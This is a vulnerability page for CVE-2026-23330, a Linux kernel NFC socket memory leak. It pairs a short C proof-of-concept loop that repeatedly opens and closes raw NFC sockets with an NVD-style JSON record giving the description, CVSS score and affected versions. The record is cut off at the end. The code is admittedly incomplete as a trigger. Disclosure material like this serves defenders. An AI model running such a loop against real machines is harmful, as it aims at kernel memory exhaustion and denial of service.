CVE-2026-23330

/* * PoC for CVE-2026-23330: Linux Kernel NFC Memory Leak * This is a conceptual PoC to demonstrate the trigger condition. * Compile: gcc -o poc_nfc_leak poc_nfc_leak.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/nfc.h> int main() { int sock; int i = 0; printf("[+] Starting PoC for CVE-2026-23330...\n"); while (1) { // Create a raw NFC socket sock = socket(AF_NFC, SOCK_RAW, NFC_SOCKPROTO_RAW); if (sock < 0) { perror("socket"); break; } // Simulate data exchange or send data to trigger pending operations // In a real exploit, specific ioctls or data would be sent here // to ensure a data exchange is pending. // Closing the socket without properly handling pending exchange // can trigger the leak if the device closes simultaneously. close(sock); i++; if (i % 1000 == 0) { printf("[+] Iterations: %d\n", i); } } return 0; }

{"cve": {"id": "CVE-2026-23330", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:30.263", "lastModified": "2026-04-27T14:16:30.523", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfc: nci: complete pending data exchange on device close\n\nIn nci_close_device(), complete any pending data exchange before\nclosing. The data exchange callback (e.g.\nrawsock_data_exchange_complete) holds a socket reference.\n\nNIPA occasionally hits this leak:\n\nunreferenced object 0xff1100000f435000 (size 2048):\n comm \"nci_dev\", pid 3954, jiffies 4295441245\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 27 00 01 40 00 00 00 00 00 00 00 00 00 00 00 00 '..@............\n backtrace (crc ec2b3c5):\n __kmalloc_noprof+0x4db/0x730\n sk_prot_alloc.isra.0+0xe4/0x1d0\n sk_alloc+0x36/0x760\n rawsock_create+0xd1/0x540\n nfc_sock_create+0x11f/0x280\n __sock_create+0x22d/0x630\n __sys_socket+0x115/0x1d0\n __x64_sys_socket+0x72/0xd0\n do_syscall_64+0x117/0xfc0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnfc: nci: completar el intercambio de datos pendiente al cerrar el dispositivo\n\nEn nci_close_device(), completar cualquier intercambio de datos pendiente antes de cerrar. La devolución de llamada de intercambio de datos (por ejemplo, rawsock_data_exchange_complete) mantiene una referencia de socket.\n\nNIPA ocasionalmente encuentra esta fuga:\n\nobjeto sin referencia 0xff1100000f435000 (tamaño 2048):\n comm 'nci_dev', pid 3954, jiffies 4295441245\n volcado hexadecimal (primeros 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 27 00 01 40 00 00 00 00 00 00 00 00 00 00 00 00 '..@............\n rastreo de pila (crc ec2b3c5):\n __kmalloc_noprof+0x4db/0x730\n sk_prot_alloc.isra.0+0xe4/0x1d0\n sk_alloc+0x36/0x760\n rawsock_create+0xd1/0x540\n nfc_sock_create+0x11f/0x280\n __sock_create+0x22d/0x630\n __sys_socket+0x115/0x1d0\n __x64_sys_socket+0x72/0xd0\n do_syscall_64+0x117/0xfc0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.1", "versionEndExcluding": "6.12.82", "matchCriteriaId": "5ED48B0D-C16E-45C6-89B1-D69ABC134156"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.17", "matchCriteriaId": "A5E006E4-59C7-43C1-9231-62A72219F2BA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.2:-:*:*:*:*:*:*", "matchCriteriaId": "2BEBAC7C-43AE-4D02-A957-26F89F27E0AC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/66083581945bd5b8e99fe49b5aeb83d03f62d053", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel ... (truncated)